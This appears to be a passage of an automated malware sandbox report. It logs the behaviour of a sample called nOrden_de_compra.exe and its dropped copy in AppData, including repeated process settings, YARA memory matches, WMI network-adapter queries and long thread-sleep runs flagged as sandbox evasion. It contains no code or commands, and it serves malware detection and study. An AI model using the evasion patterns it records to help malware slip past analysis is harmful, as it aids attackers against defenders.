                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      barindex
                      Source: Yara matchFile source: Process Memory Space: nOrden_de_compra.exe PID: 5724, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: nNdsLvHyWi.exe PID: 6640, type: MEMORYSTR
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeMemory allocated: 2AA0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeMemory allocated: 2CA0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeMemory allocated: 2AF0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeMemory allocated: 7FD0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeMemory allocated: 8FD0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeMemory allocated: 9190000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeMemory allocated: A190000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeMemory allocated: 2CD0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeMemory allocated: 2E70000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeMemory allocated: 4E70000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeMemory allocated: F50000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeMemory allocated: 27A0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeMemory allocated: 47A0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeMemory allocated: 75C0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeMemory allocated: 85C0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeMemory allocated: 8770000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeMemory allocated: 9770000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeMemory allocated: DE0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeMemory allocated: 28B0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeMemory allocated: 48B0000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4289Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4320Jump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeWindow / User API: threadDelayed 3288Jump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeWindow / User API: threadDelayed 6560Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeWindow / User API: threadDelayed 982
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeWindow / User API: threadDelayed 8870
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe TID: 988Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1808Thread sleep count: 4289 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1808Thread sleep count: 171 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5412Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5888Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3384Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5980Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe TID: 5316Thread sleep time: -27670116110564310s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe TID: 5316Thread sleep time: -100000s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe TID: 5352Thread sleep count: 3288 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe TID: 5316Thread sleep time: -99890s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe TID: 5352Thread sleep count: 6560 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe TID: 5316Thread sleep time: -99781s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe TID: 5316Thread sleep time: -99671s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe TID: 5316Thread sleep time: -99562s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe TID: 5316Thread sleep time: -99453s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe TID: 5316Thread sleep time: -99342s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe TID: 5316Thread sleep time: -99234s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe TID: 5316Thread sleep time: -99125s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe TID: 5316Thread sleep time: -99015s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe TID: 5316Thread sleep time: -98902s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe TID: 5316Thread sleep time: -98796s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe TID: 5316Thread sleep time: -98686s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe TID: 5316Thread sleep time: -98578s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe TID: 5316Thread sleep time: -98468s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe TID: 5316Thread sleep time: -98359s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe TID: 5316Thread sleep time: -98250s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe TID: 5316Thread sleep time: -98140s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe TID: 5316Thread sleep time: -98031s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe TID: 5316Thread sleep time: -97921s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe TID: 5316Thread sleep time: -97812s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe TID: 5316Thread sleep time: -97702s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe TID: 5316Thread sleep time: -97593s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe TID: 5316Thread sleep time: -97484s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe TID: 5316Thread sleep time: -97375s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe TID: 5316Thread sleep time: -97265s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe TID: 5316Thread sleep time: -97156s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe TID: 5316Thread sleep time: -97046s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe TID: 5316Thread sleep time: -96937s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe TID: 5316Thread sleep time: -96828s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe TID: 5316Thread sleep time: -96718s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe TID: 5316Thread sleep time: -96609s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe TID: 5316Thread sleep time: -96500s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe TID: 5316Thread sleep time: -96390s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe TID: 5316Thread sleep time: -96281s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe TID: 5316Thread sleep time: -96171s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe TID: 5316Thread sleep time: -96062s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe TID: 5316Thread sleep time: -95953s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe TID: 5316Thread sleep time: -99968s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe TID: 5316Thread sleep time: -99854s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe TID: 5316Thread sleep time: -99749s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe TID: 5316Thread sleep time: -99640s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe TID: 5316Thread sleep time: -99531s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe TID: 5316Thread sleep time: -99421s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe TID: 5316Thread sleep time: -99312s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe TID: 5316Thread sleep time: -99203s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe TID: 5316Thread sleep time: -99093s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe TID: 5316Thread sleep time: -98984s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe TID: 5316Thread sleep time: -98875s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe TID: 5316Thread sleep time: -98765s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe TID: 3524Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe TID: 2244Thread sleep time: -21213755684765971s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe TID: 2244Thread sleep time: -100000s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe TID: 5308Thread sleep count: 982 > 30
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe TID: 2244Thread sleep time: -99875s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe TID: 5308Thread sleep count: 8870 > 30
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe TID: 2244Thread sleep time: -99765s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe TID: 2244Thread sleep time: -99656s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe TID: 2244Thread sleep time: -99547s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe TID: 2244Thread sleep time: -99437s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe TID: 2244Thread sleep time: -99328s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe TID: 2244Thread sleep time: -99219s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe TID: 2244Thread sleep time: -99108s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe TID: 2244Thread sleep time: -99000s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe TID: 2244Thread sleep time: -98891s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe TID: 2244Thread sleep time: -98781s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe TID: 2244Thread sleep time: -98672s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe TID: 2244Thread sleep time: -98563s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe TID: 2244Thread sleep time: -98438s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe TID: 2244Thread sleep time: -98313s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe TID: 2244Thread sleep time: -98203s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe TID: 2244Thread sleep time: -98094s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe TID: 2244Thread sleep time: -97969s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe TID: 2244Thread sleep time: -97859s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe TID: 2244Thread sleep time: -97750s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe TID: 2244Thread sleep time: -97641s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe TID: 2244Thread sleep time: -97531s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe TID: 2244Thread sleep time: -97422s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe TID: 2244Thread sleep time: -97312s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe TID: 2244Thread sleep time: -97203s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe TID: 2244Thread sleep time: -97094s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe TID: 2244Thread sleep time: -96969s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe TID: 2244Thread sleep time: -99968s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe TID: 2244Thread sleep time: -99859s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe TID: 2244Thread sleep time: -99750s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe TID: 2244Thread sleep time: -99640s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe TID: 2244Thread sleep time: -99531s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe TID: 2244Thread sleep time: -99422s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe TID: 2244Thread sleep time: -99312s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe TID: 2244Thread sleep time: -99203s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe TID: 2244Thread sleep time: -99076s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe TID: 2244Thread sleep time: -98968s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe TID: 2244Thread sleep time: -98859s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe TID: 2244Thread sleep time: -98749s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe TID: 2244Thread sleep time: -98640s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe TID: 2244Thread sleep time: -98527s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe TID: 2244Thread sleep time: -98273s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe TID: 2244Thread sleep time: -98156s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe TID: 2244Thread sleep time: -98046s >= -30000s
